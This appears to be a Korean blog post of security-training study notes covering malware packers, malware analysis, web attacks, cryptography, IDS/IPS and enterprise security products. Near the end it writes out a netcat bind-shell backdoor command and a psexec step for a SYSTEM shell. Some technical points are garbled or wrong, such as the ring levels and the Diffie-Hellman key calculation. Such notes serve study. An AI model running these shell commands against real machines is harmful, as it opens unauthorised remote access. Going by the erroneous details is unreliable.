2022. 7. 21. 17:46ㆍ보안/케이쉴드
주요 해킹 사이트
https://www.fireeye.com/https://www.fireeye.kr/
apt공격
분업화 지능화된 팀의 조직적 장기적 사건
ec) 인터파크 > 개인정보법 (과징금 40억)
백신 우회 공격
.exe
.dll
.sys
.scr
>PE포맷 = 이식성이 있는, 실행 가능한
많은 실행 압축 프로그램을 사용, 다중 실행 압축 100개정도 돌린다 upx (cli, gui용)
.exe > 실행압축 > .exe (거꾸로는 언패킹)
unpacking 을 혼자서 진행(자체개발) 하게끔 하는것 > mup
악성코드의 90%는 실행 압축 되어있다.
packer
-compressor
upx
aspack
-protector
난독화 암호화등을 통해 분석을 어렵게 한다.
ex) themida_유료
https://www.oreans.com/Themida.php
악성코드분석
정적분석
동적분석
디스어셈블러
IDA pro
어셈블리 언어로 찾기
중요 명렁어 30개 정도만
.exe, dll > 어셈블리언어 = 디스어셈블 ( 반대는 어셈블)
프로그램파일 > 디버거 > 실행파일
cpu > 기계어만 인식 , 레지스터를 사용
인텔칩 한정
wing0 커널모드
wing3 사용자모드
실행파일
> 0~2g 사용자 메모리
> 2~4g 커널메모리
용량이 작아서 가상메모리를 사용
> ram 에 매핑되어있고
용량이 부족하면 h/d일부분을 메모리로 사용 (pagefile.sys, 리눅스 > swap 파티션)
eproces구조체
http + ssl > https
WAP 웹 방화벽
웹 공격 방지
positive security model 지원
ssl 지원
어플리케이셔 구조 변화에 대한 대응
Web Hacking
sql injection > sql 문 공부하기
xss
csrf
ssrf
upload
download
directory listing
추가로 공부할거 http 1.0 + 2.0, html, asp, php, jsp
목표! SSL에 관하여
SSL MITM 공격
SSL strip 공격
비밀키 암호
DES (56bit 비밀키, 64bit 블록 _ 각 8번째는 parity check 비트가 있다. 통신의 에러를 확인하기위해서 1의 개수를 짝수개로 맞춰준다. ) < 미국 표준 but 3번 breackout > triple - DES가 나옴
트리플 DES(Triple DES)는 각 데이터 블록에 데이터 암호화 알고리즘(DES)을 세번 적용한 트리플 데이터 암호화 알고리즘(TDEA 또는 트리플 DEA) 블록 암호에 대한 일반적인 이름이다.
Seed, ARIA < 한국 표준
정보통신의 아버지 - 샤논
메시지 > 약속(code)를 많이 사용 = encoding > 10101011010 (평문) > 블록을 비밀키 k 를 사용 > 암호문 > 유, 무선 전송 > 암호문 >비밀키 k 를 사용>평문> 디코딩 > 메시지
평문을 자른걸 블록
비밀키암호(수학이 적어서 속도가 빠르다) - 샤논
샤논이 증명함 > 암호를 만들떄 confusion(혼잡) deffusion(확산) 을 쓸수록 >perfect secrey (완전비밀)이라는것을 확률적으로 증명함
DES > AES (공모)
2001년 rigndael 리즌들 알고리즘 채택 (유한체 이론_수학 을 활용)
비밀키 128, 192, 256 bit
블록 128, 192, 256 bit
공유기
wep
wpa
wpa2 < 리틀존
wpa3
but!
비밀키 공유문제 > 세상은 스니핑 스푸핑 취약점 이 판친다
>> 공개키 암호 탄생함 by 디피, 헬만 (1976, new direction in ryotography)
비밀키(secret key) 암호를 사용해서 간접 전자서명을 생성
but 100%보장이 안되었다
공개키암호
공개키 p (public key): RSA, Elgamal, ECC(타원곡선암호법)
개인키 q (private key)
메세지 > 공개키 > 암호문 > q > M
but 초기버젼은 바로 breakout > mitm 공격에 취약 >> 공개키 인증의 탄생
공개키 암호를 사용해서 양쪽에 비밀키 공유
= 공개키 키 교환법(디피 핼만)
이산대수
GF(galois field 갈로아체)
GF(p) = Zp
p= 300자리 소수
디피핼만 공개키 키교환법
A매우 큰수 a 선택
g^a 를 B에게 전송
B 매우 큰수 b 선택
g^b 를 A에게 전송
두개를 곱해서 비밀키로 사용.
비밀키는 g^ab
+rsa 공개키 교환법
ecc 공개키 교환법
공개키 교환법 으로 크라이언트와 서버가 pre-master secretkey를 공유하고 > 여기서 master secretkey를 만들고 여기서 session 비밀키를 만들다.
IDS 침입탐지 시스템 > 공격 서명에 기반한
2001년 codeRed 웜 1,2,3 (공격서명(시그네이쳐)을 몰랐다)
2001년 닌다웜 _ 공유폴더, 이메일, 백도어, 특정 사이트(드라이브 바이 다운로드) > 다양한 전파경로
>> 무용론
>>비정상행위 탐지 개발
false positive 공격오인(공격이 아닌데 공격으로 인식)
false negative 정상오인(미탐_실제 공격인데 못찾음)
시그니처 기반 ids > 이상징후기반 ids
ips 침입 방지 시스템
https://m.blog.naver.com/PostView.naver?isHttpsRedirect=true&blogId=ifkiller&logNo=70156536987
ADS > 찾는법 dir /R
wips - 무선 ips
무선 공유기 탐지 솔루션
NAC(Network Access Control) 솔루션은 기업 네트워크의 사용자의 디바이스에 정책을 적용하여 네트워크 가시성과 액세스 관리를 지원합니다.
취약점 발견 > vender 연락
>공격코드 (exploit)
완전공개, 부분공개(소스코드 일부분), poc(proof of concept = 개념적 증명)
안티디도스 - 디도스 방지
DLP - 정보 유출 방지 솔루션 (data loss prevention)
steganography스테가노그래피 - carrier(mp3, jpg, 동영상)에 데이터를 숨기는 기술, 학문
주요 자산이 밖으로 나가는 것을 방지
유형
data in use
사용중인 데이터를 보호하여 불법적 활동을 모니터링 하고 표시
data in motion
네트워크를 통해 단말로 이동 하는 데이터
End system = ES
종단시스템 > 노트북, pc, 스마트폰
IS intermediate system
중간시스템
보안IS, 효율적인 대역시스템, 로드분산 IS, NMS
ES + IS = 인터넷
DRM
하드웨어 및 저작권이 있는 저작물 사용을 제한하기 위한 접근 제어 기술
자산에 대해 사용, 수정 등의 정책을 반영하여 통재
기술
verification 확인
enryption - 암호화, 제한조치 우회 방지
copy restriction - 보사 프린트 백업 제한
anti-tampering - 서명되지 않은 소프트웨어가 컨텐츠에 접근하는것을 방지
regional lockout - 특정 지역만
tracking - 워터마크, 메타데이터
엔드포인트 보안 솔루션
EDR, EPP
NPB
network packet broker
UTM
전사 위협관리
TMS
위협 관리 시스템
NMS
네트워크 관리 시스템
ESM
전사적 보안관리
SIEM
보안 정보 및 위험 이벤트 관리
SOAR
자동화가 추가됨
시스템 계정으로 로그인 방법
psexec -sid cmd
> regedit 을 더 자세하게 열어볼수 있음
관리자보다 높은 계정
백도어 여는 과정
nc -lvp 8080 -e cmd
이후 칼리에서
nc(elf32 tlfgodvkdlf)
# = 루트
#nc ip 포트번호
'보안 > 케이쉴드' 카테고리의 다른 글
오프라인 9일차 (위협에 대응하기 위한 보안 환경의 이해) (0) | 2022.07.26 |
---|---|
5일차 공통 교육 과정(윈도우) (0) | 2022.07.23 |
오프라인 8일차 (원격 조종_pc 점령하기) (0) | 2022.07.21 |
오프라인 7일차 (웨협에 대응하기 위한 보안 환경의 이해) (0) | 2022.07.18 |
오프라인 6일차 (ssrf) (0) | 2022.07.16 |